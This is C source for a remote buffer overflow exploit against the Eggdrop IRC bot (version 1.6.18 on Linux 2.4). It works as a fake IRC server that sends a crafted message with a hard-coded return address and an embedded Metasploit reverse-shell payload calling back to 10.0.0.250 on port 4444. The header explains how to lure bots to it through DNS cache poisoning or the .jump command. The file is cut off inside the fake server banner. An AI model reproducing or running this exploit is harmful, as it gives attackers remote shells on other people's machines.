1 /*
2 Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
3 http://www.securityfocus.com/bid/24070
4 discovered by Bow Sineath
5 tested on eggdrop 1.6.18 / linux 2.4
6
- the exploit is a fake ircd: it listens on the IRC port and feeds the
  connecting bot a crafted server message

- replace the shellcode; strip 0x00 and 0x0a from it (and probably a few
  more bytes the IRC line parser treats specially), and remember to keep
  the trailing \n so the message is terminated
- point the bot at this host (poison its DNS cache, or use the bot's
  .jump command)
- play.

- bangus/magnum
15 */
16
17 #include <stdio.h>
18 #include <stdlib.h>
19 #include <unistd.h>
20 #include <sys/types.h>
21 #include <sys/socket.h>
22 #include <netinet/in.h>
23 #include <string.h>
24 #include <arpa/inet.h>
25
#define LISTENPORT 6667    /* port the fake ircd accepts the bot on (standard IRC port) */
#define BACKLOG 3          /* listen(2) backlog for the fake ircd */
/* Return address overwritten in the target's stack frame.
 * Hard-coded for the environment the header names (eggdrop 1.6.18 / linux 2.4);
 * NOTE(review): a fixed stack address only holds for that exact build and
 * layout (and no ASLR) — re-derive it for any other target. */
#define RETADDR 0xbffff7b9
29
30
/*
 * Payload delivered to the bot inside the crafted server message.
 *
 * Bytes 0..98 are the Metasploit linux/x86/shell_reverse_tcp stage
 * (99 bytes, x86/shikata_ga_nai encoded, LPORT=4444, LHOST=10.0.0.250,
 * http://www.metasploit.com) — replace it with your own; the encoded bytes
 * must not contain 0x00 or 0x0a (this one does not).
 * Byte 99 is the '\n' that terminates the IRC line (see the header note),
 * and the explicit trailing 0 keeps the array a NUL-terminated string
 * (sizeof shellcode == 101), exactly as the string-literal form was.
 *
 * NOTE(review): byte 68 is 0x0d (CR). If the target's line parser treats CR
 * as a line terminator the payload must be re-encoded — confirm before use.
 */
unsigned char shellcode[] = {
    0xbf, 0x1a, 0x2f, 0xf0, 0x55, 0xdb, 0xc9, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x31, 0xc9, 0xb1,
    0x13, 0x31, 0x7b, 0x12, 0x83, 0xeb, 0xfc, 0x03, 0x61, 0x21, 0x12, 0xa0, 0xa4, 0xe6, 0x81,
    0x08, 0x95, 0x72, 0x24, 0xe5, 0x7f, 0xdb, 0xa1, 0x18, 0xb2, 0x5b, 0x22, 0x83, 0xfc, 0x63,
    0x88, 0xb4, 0xb5, 0xe2, 0xeb, 0xee, 0x1f, 0x7d, 0x06, 0x11, 0x9f, 0x87, 0x70, 0x79, 0x8e,
    0x2b, 0x3e, 0x1f, 0xe3, 0x5a, 0x21, 0x6f, 0x65, 0x0d, 0xf3, 0xc3, 0xe0, 0x4c, 0xb0, 0x2e,
    0x72, 0xdc, 0x5f, 0x9e, 0x5d, 0x92, 0xf7, 0x88, 0x8e, 0x36, 0x61, 0x27, 0x59, 0x55, 0x23,
    0xe4, 0xd0, 0x7b, 0x74, 0x01, 0x2f, 0xfb, 0x75, 0x16,
    '\n',   /* IRC line terminator, must stay last */
    0x00    /* string terminator (was implicit in the string-literal form) */
};
47
48 char *req=
49 ":hybrid7.debian.local NOTICE AUTH :*** Looking up your hostname...\n"
50 ":hybrid7.debian.local NOTICE AUTH :*** Checking Ident\n"
51 ":hybrid7.debian.local NOTICE AUTH :*** No Ident response\n"
52 ":hybrid7.debian.local NOTICE AUTH :*** Your forward and reverse DNS do not match, ignoring hostname.\n"
53 ":hybrid7.debian.local 001 tata :Welcome to the debian Internet Relay Chat Network tata\n"
54 ":hybrid7.debian.local 002 tata :Your host is hybrid7.debian.local[127.0.0.1/6667], running version hybrid−7.2.2.dfsg.1−debian−3\n"
55 ":hybrid7.debian.local 003 tata :This server